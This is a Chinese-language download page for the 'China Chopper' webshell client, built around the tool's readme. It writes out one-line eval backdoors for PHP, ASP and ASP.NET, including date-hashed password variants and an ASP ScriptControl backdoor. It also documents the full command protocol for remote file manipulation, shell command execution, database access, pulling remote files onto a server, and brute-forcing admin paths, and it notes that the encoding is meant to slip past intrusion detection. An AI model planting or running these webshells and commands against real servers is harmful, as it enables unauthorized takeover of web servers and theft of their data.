位置︰綠色聯盟 > 下載中心攻防軟件綜合工具→ 中國菜刀 純正版本下載

中國菜刀 純正版本 2018 綠色免費版

  • 運行環境︰PC-windows操作系統
  • 軟件語言︰簡體中文|授權方式︰綠色免費版
  • 軟件類型︰國產軟件 - 攻防軟件 - 綜合工具
  • 軟件大。/b>246 KB
  • 下載星級︰
  • 軟件官網︰暫無
  • 更新時間︰2018/12/24 12:03:09
軟件簡介
本站提供綠色免費版的 中國菜刀 純正版本 軟件免費下載。

【軟件截圖】

中國菜刀 純正版本

【基本介紹】

中國菜刀 正版, 滲透側式專用!
中國菜刀 純正版本功能特色:
程序就在使用過程中難免有各種BUG, 到官網看一下是否有更新吧, 說不定己經修補了呢。

----------------------------------------------------------------------------------------------------------

UINCODE方式編譯, 支持多國語言輸入顯示。

在非簡體中文環境下使用, 全自動更換成英文界面, 翻譯有誤的地方請留言指正。

一、腳本客戶端(包括但不限于EVAL)部分

  1)可以說是信息

   Eval服務端只有請求需要不復雜的一行代碼, 即可用此程序實現常用的管理功能, 功能代碼二次編碼(信息從一種形式或格式轉換為另一種形式的過程)後發送send, 過IDS的能力大幅提高。

   就在目前支持的服務端腳本︰PHP, ASP, ASP.NET, 並且支持https安全連載的網站。

   在服務端運行的代碼如下︰

   PHP:    <?php @eval($_POST['chopper']);?>

   ASP:    <%eval request("chopper")%>

   ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>

  (提醒一定要注意: ASP.NET要單獨一個文件程序或此文件也是Jscript腳本)

   Customize: 自已來定義類型,功能代碼在服務端保存,理論上支持所有動態腳本,只要對的與菜刀來進行交互即可。

  此模式可按需定制, 比如只要瀏覽目錄, 或是只要虛擬終端功能, 代碼可以能夠很簡短。

 隨日期變化的連接密碼, 服務端寫法︰

 Asp.NET:

 <%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>

 PHP:

 @eval($_POST[strtoupper(md5(gmdate("Ymd")."37E4DD20C310142564FC483DB1132F36"))]);

 例如︰菜刀的密碼為chopper, 在前面加三個字符,新密碼為︰{D}chopper

 

  2)幾大功能

   在主視圖中右鍵/添加, 在彈出的對話框中輸入服務端地址, 連接的密碼(請注意上例中的pass字串), 選擇中正確的腳本類型和語言編碼,

   保存後即可使用文件管理, 虛擬終端, 數據信息庫(稱數據集合)管理, 自寫腳本幾大塊功能。

   1. 文件管理︰[特色]緩存下載目錄, 並支持離線查看緩存目錄;

   2. 虛擬終端︰[特色]人性化的設計design, 操作方便;(輸入HELP查看更多用法), 超長命令會分割為5k字節一份, 分別提交。

   3. 數據庫管理︰[特色]圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, 以及支持ADO方式連接的數據庫。

  如果精通SQL語法, 何必還要PHPMYADMIN呢?而且, 菜刀還支持任意一個腳本的數據庫管理呢。

  (各種腳本條件下的數據庫連接方法請用鼠標點擊數據庫管理界面左上角處的配置按鈕按鍵查看)

    4. 自寫腳本︰可以通過簡單編碼後提交用戶我自己的腳本到服務端執行, 實現豐富的功能, 也可選擇發送到瀏覽器執行。

  如果要寫自己的CCC腳本, 可以參考一下CCC目錄下的示例代碼, 相信您也可以寫出功能豐富的腳本。

  可以在官網下載別人的CCC腳本, 或分享你的得意之作。

   注意︰由于服務器的安全布置設置, 某些功能有可能不能夠正常使用。

  3)  配置信息填寫說明

 ---------------------------------------------------------------------------------------

 A)  數據庫方面︰

 -----------------------------------------------------------------------------

 PHP腳本︰

 <T>類型</T> 類型可為MYSQL,MSSQL,ORACLE,INFOMIX中的一種

 <H>主機地址<H> 主機地址可為機器名或IP地址, 如localhost

 <U>數據庫用戶</U> 連接數據庫的用戶名, 如root

 <P>數據庫密碼</P> 連接數據庫的密碼, 如123455

 <L>utf8</L> 這一項數據庫類型為MYSQL腳本為PHP時可。不填則為latin1

 ASP和ASP.NET腳本︰

 <T>類型</T> 類型只能填ADO

 <C>ADO配置信息</C>

 ADO連接各種數據庫的方式不一樣。 如MSSQL的配置信息為

 Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456;

 同一個時間, 支持NT驗證登錄MSSQL數據庫, 並能把查詢的結果列表導出為html文件

 Customize 腳本︰

 <T>類型</T> 類型只能填XDB

 <X>與Customize 腳本約定的配置信息</X>

 菜刀自帶的Customize.jsp數據庫參數填寫方法如下(兩行)︰

 MSSQL:

 <X>

 com.microsoft.sqlserver.jdbc.SQLServerDriver

 jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456

 </X>

 MYSQL:

 <X>

 com.mysql.jdbc.Driver

 jdbc:mysql://localhost/test?user=root&password=123456

 </X>

 ORACLE:

 <X>

 oracle.jdbc.driver.OracleDriver

 jdbc:oracle:thin:user/password@127.0.0.1:1521/test

 </X>

 B) 其它方面︰

 -----------------------------------------------------------------------------

 添加額外附加提交的數據, 如ASP的新服務端是這樣的︰

 <%

 Set o = Server.CreateObject("ScriptControl")

 o.language = "vbscript"

 o.addcode(Request("SC"))

 o.run "ff",Server,Response,Request,Application,Session,Error

 %>

 那麼, 菜刀在配置處填入︰

 <O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>

 之後以密碼pass來連接即可。

 提交功能前先POST額外的數據包︰會話期間只提交一次。

 <POST>https://maicaidao.com/cgi-bin/login.cgi</POST>

 <DATA>uid=user1&pwd=123456</DATA>

 默認終端程序路徑設置示例︰

 <SHELL>/bin/sh</SHELL>

 虛擬終端默認命令設置示例︰

 <CMD>whoami</CMD>

 文件管理默認打開的目錄設置示例︰

 <CD>c:\windows\temp\</CD>

  3)  HTTP登錄驗證

 SHELL地址這樣填 http://user:pass@maicaidao.com/server.asp

 用戶名密碼中的特殊字符可用URL編碼轉換。

    4)  數據導入︰在SHELL列表界面, 右鍵有一項菜單, 可以把其它的菜刀庫導入到當前分類中。

二、安全掃描

  蜘蛛爬行, 綁定域名查詢, 目錄爆破。

  命令解釋:

 A) 查單一IP的綁定域名

 {reverse_ip} {url:http://www.maicaidao.com/}

 B) 掃描本C段開放的WEB服務器, 並查詢綁定域名

 {reverse_ip_c} {url:http://www.maicaidao.com/}

 C) 只掃描本C段開放的WEB服務器

 {reverse_ip_c} {url:http://www.maicaidao.com/} {port}

 D) 蜘蛛爬行

 {spider} {url:http://www.maicaidao.com/}

 E) 蜘蛛爬行, 並設定爬行範圍

 {spider} {url:http://www.maicaidao.com/} {range:maicaidao.com}

 F) 蜘蛛爬行, 過濾重復URL加快速度

 加上 {filter}

 G) 爆破功能, %s為dict中的一行

  flag:後面為返回的數據(含HTTP頭部)中的特定關鍵字

  加!!為不包含關鍵字為TRUE, 否則包含關鍵字為TRUE

  list.txt為當前目錄下的文件, 可設為絕對路徑, 注意︰一定不要包含太多的行。

  注︰從20100626版現在開始, list.txt一定要是UNICODE格式的文本文件

 {crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt}

 {crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt}

 {crack} {url:http://www.maicaidao.com/%s/} {flag:successfully} {dict:list.txt}

三、定時提醒

 當鬧鐘來用吧, 周期︰每月/每周/每日/只一次。

四、快速啟動

 一些常用的快捷方式放在這里, 可以指定用戶身份運行程序。 這部分數據是加密存儲的。

五、瀏覽器

 就是一個專用的網頁瀏覽器:Post瀏覽/自定義Cookies,/執行自定義腳本/自動刷新頁面/同IP網頁搜索。

 如果有ip.dat庫, 在狀態欄會顯示此網站的IP,國家代碼。

六、其它部分

 等待加入。

--------------------------------------------

20110628版更新注意事項

緩存庫最好重建一下。

--------------------------------------------

文件說明︰

------------------------------------------------------------------

chopper.exe 菜刀程序

db.mdb  菜刀的主數據庫

------------------------------------------------------------------

cache.tmp 菜刀的緩存數據庫(可刪除)

readme.txt 你現在正在看的(可刪除)

<CCC>  菜刀的自寫腳本(可刪除)

<Customize> Customize模式的服務端(可刪除)

 Customize.aspx 這是一個C#的示例服務端(全功能)

 Customize.jsp 這是一個jsp的示例服務端(全功能)

 Customize.CF(穿越火線)m 這是一個cfm的示例服務端(文件管理, 虛擬終端)

----附---------------------------Customize模式菜刀和服務端通信接口-----------------------------------------------------------------

----------------------------------其它語言的服務端代碼可按此接口來編寫(請參照Customize.jsp/Customize.cfm)---------------------

例︰菜刀客戶端填寫的密碼為pass, 網頁編碼選的是GB2312(Jsp服務端會用到此參數)

注︰所有參數都以POST提交, 返回的數據都要以->|為開始標記, |<-為結束標記

注︰返回的錯誤信息開頭包含ERROR:// 

注︰\t代表制表符TAB, \r\n代表換行回車, \n代表回車

注︰數據庫配置信息是一個字符串, 服務端腳本可以對此字符串格式進行自定義。

-----------------------------------------------------------------------------------------------------------------------------------

[得到當前目錄的絕對路徑]

提交︰pass=A&z0=GB2312

返回︰目錄的絕對路徑\t, 如果是Windows(窗口化操作系統system)系統後面接著加上驅動器列表

示例︰c:\inetpub\wwwroot\ C:D:E:K:

示例︰/var/www/html/ 

[目錄瀏覽]

提交︰pass=B&z0=GB2312&z1=目錄絕對路徑

返回︰先目錄後文件,目錄名後要加/, 文件名後不要加/

示例︰

 目錄名/\t時間\t大小\t屬性\n目錄名/\t時間\t大小\t屬性\n

 文件名\t時間\t大小\t屬性\n文件名\t時間\t大小\t屬性\n

[讀取文本文件]

提交︰pass=C&z0=GB2312&z1=文件絕對路徑

返回︰文本文件的內容

[寫入文本文件]

提交︰pass=D&z0=GB2312&z1=文件絕對路徑&z2=文件內容

返回︰成功返回1,不成功返回錯誤信息

[刪除文件或目錄]

提交︰pass=E&z0=GB2312&z1=文件或目錄的絕對路徑

返回︰成功返回1,不成功返回錯誤信息

[下載文件]

提交︰pass=F&z0=GB2312&z1=服務器文件的絕對路徑

返回︰要下載文件的內容

[上傳文件]

提交︰pass=G&z0=GB2312&z1=文件上傳後的絕對路徑&z2=文件內容(十六進制文本格式)

返回︰要下載文件的內容

[復制文件或目錄後粘貼]

提交︰pass=H&z0=GB2312&z1=復制的絕對路徑&z2=粘貼的絕對路徑

返回︰成功返回1,不成功返回錯誤信息

[文件或目錄重命名]

提交︰pass=I&z0=GB2312&z1=原名(絕對路徑)&z2=新名(絕對路徑)

返回︰成功返回1,不成功返回錯誤信息

[新建目錄]

提交︰pass=J&z0=GB2312&z1=新目錄名(絕對路徑)

返回︰成功返回1,不成功返回錯誤信息

[修改文件或目錄時間]

提交︰pass=K&z0=GB2312&z1=文件或目錄的絕對路徑&z2=時間(格式︰yyyy-MM-dd HH:mm:ss)

返回︰成功返回1,不成功返回錯誤信息

[下載文件到服務器]

提交︰pass=L&z0=GB2312&z1=URL路徑&z2=下載後保存的絕對路徑

返回︰成功返回1,不成功返回錯誤信息

[執行Shell命令(Shell路徑前會根據記錄服務器系統類型加上-c或/c參數)]

提交︰pass=M&z0=GB2312&z1=(-c或/c)加Shell路徑&z2=Shell命令

返回︰命令執行結果

[得到數據庫基本信息]

提交︰pass=N&z0=GB2312&z1=數據庫配置信息

返回︰成功返回數據庫(以制表符\t分隔),  不成功返回錯誤信息

[獲取數據庫表名]

提交︰pass=O&z0=GB2312&z1=數據庫配置信息\r\n數據庫名

返回︰成功返回數據表(以\t分隔),  不成功返回錯誤信息

[獲取數據表列名]

提交︰pass=P&z0=GB2312&z1=數據庫配置信息\r\n數據庫名\r\n數據表名

下載地址
軟件說明
* 為了達到最快的下載速度,推薦使用迅雷下載。
* 請一定升級到最新版WinRAR解壓縮軟件才能正常解壓本站提供的軟件!
* 站內提供的所有軟件由網上搜集,若侵犯了你的版權利益,敬請來信通知我們!